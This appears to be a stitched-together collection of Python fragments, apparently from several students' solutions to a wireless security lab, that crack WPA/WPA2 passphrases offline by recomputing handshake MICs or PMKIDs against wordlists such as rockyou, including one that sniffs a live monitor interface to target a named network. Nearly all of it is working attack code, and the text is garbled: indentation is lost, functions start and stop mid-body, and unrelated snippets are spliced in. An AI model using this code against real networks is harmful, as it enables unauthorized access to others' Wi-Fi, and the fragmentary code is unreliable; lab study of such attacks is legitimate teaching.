def keyDerivation(passphrase, ssid, ap_mac, sta_mac, ANonce, SNonce, data,
hmac_algo):
'''
Calculate PMK/PTK/MIC
'''
A = "Pairwise key expansion" #this string is used in the pseudo-random function
B = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(
ANonce, SNonce) + max(ANonce, SNonce) #used in pseudo-random function
#calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
passphrase = str.encode(passphrase)
ssid = str.encode(ssid)
pmk = pbkdf2(hashlib.sha1, passphrase, ssid, 4096, 32)
#expand pmk to obtain PTK
ptk = customPRF512(pmk, str.encode(A), B)
#calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
if (hmac_algo == 1):
mic = hmac.new(ptk[0:16], data, hashlib.md5)
elif (hmac_algo == 2):
mic = hmac.new(ptk[0:16], data, hashlib.sha1)
return pmk, ptk, mic
def tryPmkid(passphrase, ssid, ap_mac, sta_mac):
passphrase = str.encode(passphrase)
pmk = pbkdf2(hashlib.sha1, passphrase, str.encode(ssid), 4096, 32)
pmk_data = str.encode("PMK Name") + a2b_hex(ap_mac) + a2b_hex(sta_mac)
pmkid = b2a_hex(hmac.new(pmk, pmk_data,
hashlib.sha1).digest()[:16]).decode('UTF-8')
return pmkid
def calcMIC(wpa):
# Important parameters for key derivation - some of them can be obtained from the pcap file
# passPhrase = "actuelle" #this is the passphrase of the WPA network
A = "Pairwise key expansion" # this string is used in the pseudo-random function and should never be modified
ssid = wpa[0].info # "SWI"
APmac = a2b_hex(wpa[1].addr2.replace(
":", "")) # a2b_hex("cebcc8fdcab7") #MAC address of the AP
Clientmac = a2b_hex(wpa[1].addr1.replace(
":", "")) # a2b_hex("0013efd015bd") #MAC address of the client
# Authenticator and Supplicant Nonces
ANonce = a2b_hex(
b2a_hex(wpa[5].load)[26:90]
) # a2b_hex("90773b9a9661fee1f406e8989c912b45b029c652224e8b561417672ca7e0fd91")
SNonce = a2b_hex(
b2a_hex(wpa[6].load)[26:90]
) # a2b_hex("7b3826876d14ff301aee7c1072b5e9091e21169841bce9ae8a3f24628f264577")
# This is the MIC contained in the 4th frame of the 4-way handshake. I copied it by hand.
# When trying to crack the WPA passphrase, we will compare it to our own MIC calculated using passphrases from a dictionary
# mic_to_test = b2a_hex(wpa[8].load[77:93]) # "36eef66540fa801ceee2fea9b7929b40"
mic_to_test = b2a_hex(wpa[8].load)[154:186]
B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(
ANonce, SNonce) + max(ANonce, SNonce) # used in pseudo-random function
# Take a good look at the contents of this variable. Compare it to the Wireshark last message of the 4-way handshake.
# In particular, look at the last 16 bytes. Read "Important info" in the lab assignment for explanation
data = bytes(wpa[8].payload.payload.payload.payload.payload)
data = data[:-18] + data[-34:-18] + data[-2:]
with open(filename) as dictionary:
for passPhrase in dictionary:
# calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
passPhrase = str.encode(passPhrase)[:-1]
pmk = pbkdf2(hashlib.sha1, passPhrase, ssid, 4096, 32)
# expand pmk to obtain PTK
ptk = customPRF512(pmk, str.encode(A), B)
# calculate our own MIC over EAPOL payload - The ptk is, in fact, KCK|KEK|TK|MICK
if int.from_bytes(wpa[5].load[0:1], byteorder='big') == 2:
mic = hmac.new(ptk[0:16], data, hashlib.sha1)
else:
mic = hmac.new(ptk[0:16], data, hashlib.md5)
# # the MIC for the authentication is actually truncated to 16 bytes (32 chars). SHA-1 is 20 bytes long.
# MIC_hex_truncated = mic.hexdigest()[0:32]
mic_digest = mic.hexdigest()[:-8]
print(mic_to_test.decode())
print(mic_digest)
if mic_to_test.decode() == mic_digest:
print("Found the passphrase : ", passPhrase)
return True
return False
def pkt_callback(pkt):
# Read the passphrase from the file wordlist
passPhrases = open("wordlist", "r").read().split("\n")
A = "Pairwise key expansion" #this string is used in the pseudo-random function
#cf "Quelques détails importants" dans la donnée
data = a2b_hex(
"0103005f02030a0000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
)
if pkt.haslayer(EAPOL):
# We supposed that the handshake packets are arriving in the correct order and one after another
pktList.append(pkt)
if (len(pktList) == 4):
# Authenticator and Supplicant Nonces
# We transform them to the correct encoding
ANonce = a2b_hex(pktList[0].getlayer(Raw).load.hex()[26:90])
SNonce = a2b_hex(pktList[1].getlayer(Raw).load.hex()[26:90])
APmac = a2b_hex((pktList[0][Dot11].addr3).replace(":", ""))
Clientmac = a2b_hex((pktList[0][Dot11].addr1).replace(":", ""))
# This is the MIC contained in the 4th frame of the 4-way handshake
# When attacking WPA, we would compare it to our own MIC calculated using passphrases from a dictionary
mic_to_test = pktList[3].getlayer(Raw).load.hex()[154:-4]
print("[*] MIC found: " + mic_to_test)
B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(
ANonce, SNonce) + max(ANonce,
SNonce) #used in pseudo-random function
for passPhrase in passPhrases:
# calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
passPhrase = str.encode(passPhrase)
pmk = pbkdf2(hashlib.sha1, passPhrase, str.encode(ssid), 4096,
32)
# expand pmk to obtain PTK
ptk = customPRF512(pmk, str.encode(A), B)
# calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
mic = hmac.new(ptk[0:16], data, hashlib.sha1)
print(mic.hexdigest())
if mic.hexdigest()[:len(mic_to_test)] == mic_to_test:
print("[*] The passphrase (" + str(passPhrase) +
") is correct")
exit()
print("[*] The passphrase: " + str(passPhrase) +
" is not correct. Try with a different passphrase")
def compute_pmkid(passphrase, ssid, bssid, sta_mac):
"""
Compute the PMKID for the given passphrase, BSSID and STA MAC address.
:param passphrase: the passphrase
:param bssid: the AP's BSSID
:param sta_mac: the STA MAC address
:return:
"""
pmk = pbkdf2(hashlib.sha1, str.encode(passphrase), ssid, 4096, 32)
data = b'PMK Name' + mac2str(bssid) + mac2str(sta_mac)
return hmac.new(pmk, data,
hashlib.sha1).digest()[:16] # first 128 bits only
def bruteForceWPA(handshakeList):
global ssid
global APmac
global Clientmac
# Authenticator and Supplicant Nonces
nonceStartingOffset = 13
nonceEndOffset = 45
ANonce = handshakeList[0].load[nonceStartingOffset:nonceEndOffset]
SNonce = handshakeList[1].load[nonceStartingOffset:nonceEndOffset]
# This is the MIC contained in the 4th frame of the 4-way handshake
# When attacking WPA, we would compare it to our own MIC calculated using passphrases from a dictionary
micStartingOffset = 77
micEndOffset = 93
mic_to_test = handshakeList[3].load[micStartingOffset:micEndOffset]
B = min(APmac,Clientmac)+max(APmac,Clientmac)+min(ANonce,SNonce)+max(ANonce,SNonce) #used in pseudo-random function
# Here we are taking the data from the WIFI version, until the start of the MIC, and then we simply append a bunch of zero bytes at the end.
data = bytes(handshakeList[3][EAPOL])[:micStartingOffset] + b'\x00' * 22
ssid = str.encode(ssid)
fileName = arguments.w
found = False
# Used to know wether it is HMAC-MD5 or HMAC-SHA1
keyDescriptorVersion = int.from_bytes(handshakeList[0].load[0:1], byteorder='big')
with open(fileName) as wordlist:
for passPhrase in wordlist:
# Calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
# We are getting rid of the '\n'
passPhrase = str.encode(passPhrase[:-1])
pmk = pbkdf2(hashlib.sha1,passPhrase, ssid, 4096, 32)
# Expand pmk to obtain PTK
ptk = customPRF512(pmk,str.encode(A),B)
# Calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
if(keyDescriptorVersion == 2):
# In the case of SHA-1, we have to truncate the hash in order for it to fit in the packet
mic = hmac.new(ptk[0:16],data,hashlib.sha1).hexdigest()[:-8]
else:
mic = hmac.new(ptk[0:16],data,hashlib.md5).hexdigest()
if mic == b2a_hex(mic_to_test).decode():
print("[+] Found passphrase: " + passPhrase.decode())
# Source: https://www.geeksforgeeks.org/python-exit-commands-quit-exit-sys-exit-and-os-_exit/
sys.exit("")
if not found:
print("[-] Passphrase not found !")
def crack():
global ssid, APmac, Clientmac, ANonce, SNonce, mic_to_test, data, sniff, A
print ("\n\nValues used to derivate keys")
print ("============================")
print ("SSID: ",ssid)
print ("AP Mac: ",APmac.encode())
print ("Cient Mac: ",Clientmac.encode())
print ("AP Nonce: ",ANonce)
print ("Client Nonce: ",SNonce)
print ("Mic: ",mic_to_test)
B = min(a2b_hex(APmac),a2b_hex(Clientmac))+max(a2b_hex(APmac),a2b_hex(Clientmac))+min(a2b_hex(ANonce),a2b_hex(SNonce))+max(a2b_hex(ANonce),a2b_hex(SNonce))
# Load the wordlist and iterate over it
with open("wordlist.txt") as f:
while(True):
passPhrase = f.readline().replace("\n", "")
if passPhrase == "":
break
#calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
passPhrase = str.encode(passPhrase)
pmk = pbkdf2(hashlib.sha1,passPhrase,ssid.encode(), 4096, 32)
#expand pmk to obtain PTK
ptk = customPRF512(pmk,str.encode(A),B)
#calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
mic = hmac.new(ptk[0:16],data,hashlib.sha1)
print ("\nResults of the key expansion")
print ("=============================")
print ("Passphrase: ",passPhrase)
print ("PMK:\t\t",pmk.hex())
print ("PTK:\t\t",ptk.hex())
print ("KCK:\t\t",ptk[0:16].hex())
print ("KEK:\t\t",ptk[16:32].hex())
print ("TK:\t\t",ptk[32:48].hex())
print ("MICK:\t\t",ptk[48:64].hex())
print ("MIC:\t\t",mic.digest()[:-4])
print ("ORIG MIC:\t",mic_to_test)
# Check if the calculated mic is the same as the mic
if mic_to_test == mic.digest()[:-4]:
print("Found Passphrase: ", passPhrase.decode())
exit(0)
print("Could not find passphrase")
def crack_pass(pkts, mic_to_test):
passwords_file = open(wordlist_filename, 'r')
passwords = passwords_file.readlines()
passphrase_ret = "Not found"
data = bytes(pkts[3][EAPOL])[:77] + b'\x00' * 22
print("\nCracking WPA Passphrase")
print("=============================")
for psw in passwords:
# We don't take the final '\n'
passphrase = str.encode(psw[:-1])
#calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
pmk = pbkdf2(hashlib.sha1, passphrase, str.encode(ssid), 4096, 32)
#expand pmk to obtain PTK
B = min(a2b_hex(APmac.replace(":", "")),
a2b_hex(Clientmac.replace(":", ""))) + max(
a2b_hex(APmac.replace(":", "")),
a2b_hex(Clientmac.replace(":", ""))) + min(
a2b_hex(ANonce), a2b_hex(SNonce)) + max(
a2b_hex(ANonce), a2b_hex(SNonce))
ptk = customPRF512(pmk, str.encode(A), B)
#Check if it's MD5 or SHA1 with the KeyDescriptorVersion
kdv = int.from_bytes(pkts[3].load[0:1], byteorder='big')
#calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
if kdv == 2:
mic = hmac.new(ptk[0:16], data, hashlib.sha1).hexdigest()[:-8]
else:
mic = hmac.new(ptk[0:16], data, hashlib.md5).hexdigest()
print("Passphrase tested : ", psw)
#Compare the MICs
if hmac.compare_digest(mic, mic_to_test):
print("\nPassphrase found !\n")
passphrase_ret = psw
break
print("\nResult of the passphrase cracking")
print("=============================")
print("The passphrase is : ", passphrase_ret, "\n")
passwords_file.close()
def get_passphrase(pmkid, ssid, mac_ap, mac_sta):
# format data
ssid = ssid.encode()
mac_ap = a2b_hex(mac_ap.replace(':', ''))
mac_sta = a2b_hex(mac_sta.replace(':', ''))
pmkid = pmkid.decode('utf-8')
with open("wordlist.txt") as f:
for line in f:
passphrase = line.replace('\n', '').encode()
# generate pmk with a passphrase from the wordlist
pmk = pbkdf2(hashlib.sha1, passphrase, ssid, 4096, 32)
# generate pmkid related to the actual passphrase
pmkid_calc = hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta,
hashlib.sha1).hexdigest()[:32]
# if they match it means we got the right passphrase
if (pmkid == pmkid_calc):
return passphrase
return None
# Read capture file -- it contains beacon, authentication, associacion, handshake and data
wpa=rdpcap("PMKID_handshake.pcap")
# Important parameters for key derivation - most of them can be obtained from the pcap file
ssid = wpa[0].info
APmac = a2b_hex(wpa[145].addr2.replace(':',''))
Clientmac = a2b_hex(wpa[145].addr1.replace(':',''))
PMKID = hexlify(wpa[145].load[101:])
print("SSID :", ssid.decode("utf-8"))
print("AP Mac :", b2a_hex(APmac).decode("utf-8"))
print("Client Mac :", b2a_hex(Clientmac).decode("utf-8"))
#Lecture du fichier de mdp
mdpFile = open('rockyou-65.txt', 'r')
lines = mdpFile.readlines()
#Test de tous les mots de passe de la liste
for line in lines :
password = str.encode(line[:-1])
pmk = pbkdf2(hashlib.sha1,password, ssid, 4096, 32)
pmkid = hmac.new(pmk, str.encode("PMK Name") + APmac + Clientmac, hashlib.sha1).hexdigest()[:32]
print(password.decode("utf-8"), pmkid, PMKID.decode("utf-8") )
#Comparaison du PMKID (trouvé dans le fichier pcap) et le PMKID générer avec le mot de passe de la liste
if(pmkid == PMKID.decode("utf-8") ):
print("The passephrase is " + line)
exit(0)
from Crypto.Cipher import AES
import os
#import PBKDF2
import pbkdf2
#from pbkdf2 import pbkdf2
salt = os.urandom(8) # 64-bit salt
key = pbkdf2("This passphrase is a secret.", salt).read(32) # 256-bit key
iv = os.urandom(16) # 128-bit IV
cipher = AES.new(key, AES.MODE_CBC, iv)
mic_to_test = wpa[8].load.hex()[-36:][:
-4] # "36eef66540fa801ceee2fea9b7929b40"
B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(ANonce, SNonce) + max(
ANonce, SNonce) #used in pseudo-random function
data = a2b_hex(
scapy.utils.linehexdump(wpa[8][EAPOL], 0, 1, True).replace(
" ", "").lower()[:162] + "0" * 32 + "0" * 4)
with open('dico.txt') as f:
for passPhrase in f:
if (passPhrase[-1] == '\n'):
passPhrase = passPhrase[:-1]
#calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
pmk = pbkdf2(hashlib.sha1, passPhrase.encode(), ssid, 4096, 32)
#expand pmk to obtain PTK
ptk = customPRF512(pmk, str.encode(A), B)
#calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
mic = hmac.new(ptk[0:16], data, hashlib.sha1)
# We remove the icv, because it's not relevant for the attack.
#Mic comparison
if (mic.hexdigest()[:-8] == mic_to_test):
foundPassphrase = True
print("\n\npassPhrase found, value : ", passPhrase, "\n")
print("Values used to derivate keys")
print("============================")
def PMKID(key, ssid, staMAC, apMAC):
key = pbkdf2(hashlib.sha1, key, ssid, 4096, 32)
return hmac.new(key,
str.encode('PMK Name') + apMAC + staMAC,
hashlib.sha1).digest()[:16]
def main():
APmac = b''
Clientmac = b''
ANonce = b''
SNonce = b''
crypto = b''
mic_to_test = b''
# Get 1000 packages from the monitor interface
wpa = sniff(iface='wlp1s0mon', count=1000)
# The network to attack
ssid = "SWI"
# Get the Association request who contains APmac address, Clientmac address and the ssid
# We verify if the packet is from the network to attack
for trame in wpa:
if trame.subtype == 0x0 and trame.type == 0x0 and trame.info.decode(
"ascii") == ssid:
APmac = a2b_hex(trame.addr1.replace(':', ''))
Clientmac = a2b_hex(trame.addr2.replace(':', ''))
break
# Get the ANonce based on the MAC address
for trame in wpa:
if trame.subtype == 0x0 \
and trame.type == 0x2 \
and a2b_hex(trame.addr2.replace(':', '')) == APmac \
and a2b_hex(trame.addr1.replace(':', '')) == Clientmac:
ANonce = trame.getlayer(WPA_key).nonce
break
isSNonceKnown = False
for trame in wpa:
# Get the SNonce based on the MAC address
if not isSNonceKnown \
and trame.subtype == 0x8 \
and trame.type == 0x2 \
and a2b_hex(trame.addr1.replace(':', '')) == APmac \
and a2b_hex(trame.addr2.replace(':', '')) == Clientmac:
SNonce = raw(trame)[65:-72]
isSNonceKnown = True
# Get the WPA key MIC
elif trame.subtype == 0x8 \
and trame.type == 0x2 \
and a2b_hex(trame.addr1.replace(':', '')) == APmac \
and a2b_hex(trame.addr2.replace(':', '')) == Clientmac:
mic_to_test = raw(trame)[-18:-2].hex()
# Get the value of the key Information MD5 (1) or SHA1 (2)
crypto = raw(trame)[0x36] & 0x2
# ---------------------------------------------------------------
# Get a list of passPhrase from the wordlist
wordlist = open("wordlist.txt", "r")
passPhrases = [x.strip() for x in wordlist.readlines()]
wordlist.close()
ssid = str.encode(ssid)
# Test chaque passPhrase
for passPhrase in passPhrases:
# Important parameters for key derivation - most of them can be obtained from the pcap file
A = "Pairwise key expansion" # this string is used in the pseudo-random function
B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(
ANonce, SNonce) + max(ANonce,
SNonce) # used in pseudo-random function
data = a2b_hex(
"0103005f02030a0000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
) # cf "Quelques détails importants" dans la donnée
# calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
passPhrase = str.encode(passPhrase)
# MD5 = 0x01 & SHA1 = 0x02
if crypto == 0x01:
pmk = pbkdf2(hashlib.md5, passPhrase, ssid, 4096, 32)
else:
pmk = pbkdf2(hashlib.sha1, passPhrase, ssid, 4096, 32)
# expand pmk to obtain PTK
ptk = customPRF512(pmk, str.encode(A), B)
# calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
mic = hmac.new(ptk[0:16], data, hashlib.sha1)
# Test if the current passphrase is valid
if mic_to_test == mic.hexdigest()[:32]:
print("You win ! The passphrase is : " + passPhrase.decode())
return False
return True
print("\n\nValues used to derivate keys")
print("============================")
print("Passphrase: ", passPhrase, "\n")
print("SSID: ", ssid, "\n")
print("AP Mac: ", b2a_hex(APmac), "\n")
print("CLient Mac: ", b2a_hex(Clientmac), "\n")
print("AP Nonce: ", b2a_hex(ANonce), "\n")
print("Client Nonce: ", b2a_hex(SNonce), "\n")
ssid = str.encode(ssid)
wpaVersion = wpa[8][EAPOL].load[2] #Contient la version description de la clé
# Test chaque passephrase du dictionnaire
for i in range(len(dic)):
#calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
passPhrase = str.encode(dic[i])
pmk = pbkdf2(hashlib.sha1 if wpaVersion == 10 else hashlib.md5, passPhrase,
ssid, 4096, 32)
#expand pmk to obtain PTK
ptk = customPRF512(pmk, str.encode(A), B)
#calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
mic = hmac.new(ptk[0:16], data, hashlib.sha1).hexdigest()[:-8]
print("Mic to test : ", mic_to_test, "\n")
print("Mic generated : ", mic, "\n")
if mic == mic_to_test:
print("Good passphrase : ", passPhrase.decode(), "\n")
break
else:
print("Bad passphrase : ", passPhrase.decode(), "\n")
if i == len(dic) - 1:
B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(ANonce, SNonce) + max(
ANonce, SNonce) #used in pseudo-random function
data = a2b_hex(
"0103005f02030a0000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
) #cf "Quelques détails importants" dans la donnée
ssid = str.encode(ssid)
for word in passphrase:
wordEncode = str.encode(word)
# Check the version of the key to apply MD5 or SHA-1
if keyInformation != 10:
pmk = pbkdf2(hashlib.md5, wordEncode, ssid, 4096, 32)
else:
pmk = pbkdf2(hashlib.sha1, wordEncode, ssid, 4096, 32)
#expand pmk to obtain PTK
ptk = customPRF512(pmk, str.encode(A), B)
#calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK, [:-8] to remove the ICV
mic = hmac.new(ptk[0:16], data, hashlib.sha1).hexdigest()[:-8]
# Test if the two mic match, if yes print message and stop, if not continue to check with the word in file
if mic == mic_to_test:
print("The passphrase used is correct : ", word, "\n")
break
else:
print("Try a new passphrase : ", word, "\n")
passphrases = [word for line in file for word in line.split()]
# For each potential passphrase in the file we calculate the MIC
for passPhrase in passphrases:
print("Passphrase tested : ", passPhrase)
A = "Pairwise key expansion" #this string is used in the pseudo-random function
B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(
ANonce, SNonce) + max(ANonce, SNonce) #used in pseudo-random function
data = a2b_hex(
"0103005f02030a0000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
) #cf "Quelques détails importants" dans la donnée
#calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
passPhrase = str.encode(passPhrase)
pmk = pbkdf2(hashlib.sha1, passPhrase, str.encode(ssid), 4096, 32)
#expand pmk to obtain PTK
ptk = customPRF512(pmk, str.encode(A), B)
#calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
mic = hmac.new(ptk[0:16], data, hashlib.sha1)
# MIC calculated with key derivated from potential passphrase tested
current_mic = mic.hexdigest()[:-8]
# If the MIC calculated above is the same as the one from the last 4-way handshake message, we found the passphrase
if current_mic == mic_to_test:
print("PASSPHRASE FOUND : ", passPhrase.decode())
exit(0)
for i in range(len(wpa)):
if wpa[i].haslayer(EAPOL):
"""
Il s'agit des informations de la clé (Champs <<Key Information>>), elle définit les différents flags tel que les clés qui sont "set" ou non, s'il y a une erreur, etc... .
La valeur 0x008a au niveau des flags de la clé est toujours la même pour le message 1 dans la pcap de ce labo ou du labo précédent.
"""
if wpa[i][EAPOL].original.hex()[10:14] == "008a":
wpaMessageOne = wpa[i]
PMKID = binascii.hexlify(wpaMessageOne.getlayer(Raw).load)[
202:234] # Extraction de la PMKID.
if PMKID != nullPMKID and PMKID != '':
found = True
break # On évite de bouclé inutilement si on trouve le message 1 du 4 way handshake.
if not found:
exit("No PMKID found")
print("PMKID : ", PMKID.decode())
print("AP Mac : ", b2a_hex(APmac).decode())
print("Client Mac : ", b2a_hex(Clientmac).decode())
for i in range(len(dic)):
passPhrase = str.encode(dic[i])
pmk = pbkdf2(hashlib.sha1, bytes(passPhrase), ssid.encode('utf-8'), 4096,
32)
pmkid_calc = hmac.new(pmk,
"PMK Name".encode('utf-8') + APmac + Clientmac,
digestmod=hashlib.sha1).hexdigest()
if pmkid_calc[:-8].encode('utf-8') == PMKID:
print("\nMot de passe trouvé : ", passPhrase.decode())
except:
pass
except:
pass
pmkid = hexlify(handshake.load)[-32:]
ap_mac = a2b_hex(str.replace(handshake.addr2, ":", ""))
client_mac = a2b_hex(str.replace(handshake.addr1, ":", ""))
data = A.encode() + ap_mac + client_mac
found = False
with open(filename) as dictionary:
for passPhrase in dictionary:
# calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
passPhrase = str.encode(passPhrase)[:-1]
pmk = pbkdf2(hashlib.sha1, passPhrase, ssid, 4096, 32)
pmkid_calc = hmac.new(pmk, data, hashlib.sha1)
test = pmkid_calc.hexdigest()[:-8]
if pmkid == str.encode(test):
print("Passphrase is : " + passPhrase.decode())
found = True
if not found:
print("No passphrase found")
except Exception as e:
#print(e)
continue
print("\nValues used to execute PKMID attack")
print("============================")
print("SSID: ", ssid.decode("utf-8"))
print("AP Mac: ", b2a_hex(APmac).decode("utf-8"))
print("CLient Mac: ", b2a_hex(Clientmac).decode("utf-8"), "\n")
# Début de l'attaque PMKID
print("Starting the PMKID attack")
with open('dictionnary'
) as dictionnary: # Ouverture du dictionnaire personnalisé
for currentPass in dictionnary: # On parcourt tous les mots du dictionnaire
currentPass = currentPass[:-1] # On enleve le \n
print("Testing " + currentPass)
currentPass = str.encode(
currentPass) # On transforme la string en bytes
pmkTmp = pbkdf2(hashlib.sha1, currentPass, ssid, 4096,
32) # Calcul du PMK
pmkidTmp = hmac.new(pmkTmp,
str.encode("PMK Name") + APmac + Clientmac,
hashlib.sha1).hexdigest(
)[:32] # Calcul du PMKID pour le pass courant
if (
pmkid == str.encode(pmkidTmp)
): # On vérifie si le PMKID calculé est le même que celui récupéré dans les trames, si oui on arrête si non on test une autre passphrase.
print("!!! pass found " + currentPass.decode("utf-8") + " !!!")
exit(1)
mic_to_test = wpa[8].load[77:93] #c'est le 4eme handshake qui contient le mic #"36eef66540fa801ceee2fea9b7929b40"
B = min(APmac,Clientmac)+max(APmac,Clientmac)+min(ANonce,SNonce)+max(ANonce,SNonce) #used in pseudo-random function
data = bytes(wpa[8][EAPOL])[0:77] + b'\x00'*(len(mic_to_test)+6) #we copy until where the mic start, then pad with the length of the mix + some bytes to have only zeros at the end
ssid = str.encode(ssid)
# read wordlist line by line
with open('wordlist.txt') as fp:
passPhrase = fp.readline()[:-1]
found = False
while passPhrase:
pp = str.encode(passPhrase)
# calculate 4096 rounds to obtain the 256 bit (32 oct) PMK
pmk = pbkdf2(hashlib.sha1,pp, ssid, 4096, 32)
# expand pmk to obtain PTK
ptk = customPRF512(pmk,str.encode(A),B)
# calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK
# compute mic from pass phrase
mic = hmac.new(ptk[0:16],data,algo).digest()[:16]
# test the computed mic with the mic from the handshake
if mic.hex() == mic_to_test.hex():
print("The pass phrase is : " + passPhrase)
found = True
break
passPhrase = fp.readline()[:-1]
